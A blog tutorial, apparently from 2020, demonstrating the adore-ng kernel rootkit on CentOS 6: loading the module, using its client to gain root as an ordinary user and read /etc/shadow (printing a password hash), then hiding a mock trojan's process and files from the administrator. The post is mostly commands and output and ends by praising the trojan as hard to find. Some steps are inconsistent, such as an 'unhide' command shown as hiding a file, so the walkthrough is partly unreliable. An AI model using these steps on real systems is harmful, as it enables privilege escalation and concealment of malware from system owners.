Adore ng trojan in Rootkit

Rootkit is a kind of special malicious software. Its function is to hide the information of itself and specified files, processes and network links on the installation target. What is more common is that rootkit is generally used in combination with Trojans, backdoors and other malicious programs.

In our life, there is an essential character in spy films, which we often watch. Its duty is: good camouflage makes the opponent unaware of this for a long time; he wins the trust of the enemy and therefore holds the important position, which enables him to continuously obtain important information and use its unique channel to transmit it back.

And what we're going to learn in simulation today is one of the rootkits similar to it: adore ng

Environment: Centos 6

Two resources needed here (downloadable):

  • adore-ng-master.zip
    -link
  • kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
    -link

Install adore ng

Installation dependency: kernel-devel-2.6

[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm 
Loaded plugins: fastestmirror, security
Setting up Install Process
......
Installed:
  kernel-devel.x86_64 0:2.6.32-754.27.1.el6                                                                                          
Complete!

Extract and install adore ng

[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root  1143 Dec 30  2015 Makefile
# There is already a makefile file. You can compile it directly with make-j 4
[root@Fp-01 adore-ng-master]# make -j 4

Loading module

[root@Fp-01 adore-ng-master]# insmod adore-ng.ko

view help

[root@Fp-01 adore-ng-master]# ./ava
       I print info (secret UID etc)	
       h hide file	# Hidden files
       u unhide file	# Unhide file
       r execute as root	# Execute as root
       R remove PID forever	# Permanently delete PID
       U uninstall adore	# Uninstall adore
       i make PID invisible	# Hidden PID
       v make PID visible	# Unhide PID

Common user is entitled to root

Add an ordinary user for a test

[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.

Copy adore ng to / tmp, because the user cannot enter the root directory after switching. cp -r: recursive copy

[root@Fp-01 ~]# cp -r adore-ng-master /tmp/

Switch users and log in to the server with tom user

[root@Fp-01 ~]# ssh tom@10.0.0.11
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password: 
[tom@Fp-01 ~]$ whoami
tom

Test, edit / etc/shadow

[tom@Fp-01 ~]$ vim /etc/shadow                                                                     ......                     
"/etc/shadow" [Permission Denied] 

You can see that the permission is denied. At this time, you need to use ava to withdraw the right

[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
......

View the process on another terminal, and the user identity is root, indicating that the right is raised successfully

[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root      32703  30867  0 12:03 pts/3    00:00:00 vim /etc/shadow
root      32727  32667  0 12:03 pts/4    00:00:00 grep /etc/shadow

Hide Trojan process

Simulate editing a Trojan

[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash

while :
do
        echo `This is the virus` >> date.txt
        sleep 1
done

Simple simulation Trojan program, output "this is virus body", plus execution permission, run in the background

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.

Check the process first, and pass the process number

[tom@Fp-01 script]$ ps -ef |grep 33987
root      33987  30867  0 12:14 pts/3    00:00:00 /bin/bash ./a.sh
root      34137  33987  0 12:14 pts/3    00:00:00 sleep 1
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987

As you can see, next, simulate the hacker hiding process

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.

Hide success. At this time, we will check the process and find that the process has been hidden

[tom@Fp-01 script]$ ps -ef |grep 33987
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987

Big move: hide files

First, check the file information in the / opt directory

[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
    ├── a.sh
    └── date.txt

We simulate hiding date.txt

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.

At this time, go to check and find that the file has not been found

[root@Fp-01 script]# tree /opt/
/opt/
└── script
    └── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh

Propose root permission – > Hide parent process – > parent process start child process (virus) – > Hide Folder

In the end, it's a Trojan virus, which is hard to find by the system administrator

Only a blog that infuses ideas is a good blog

Published 10 original articles, won praise 13, visited 1147
Private letter follow

Tags: vim RPM Makefile network

Posted on Thu, 13 Feb 2020 00:15:54 -0500 by dreamlove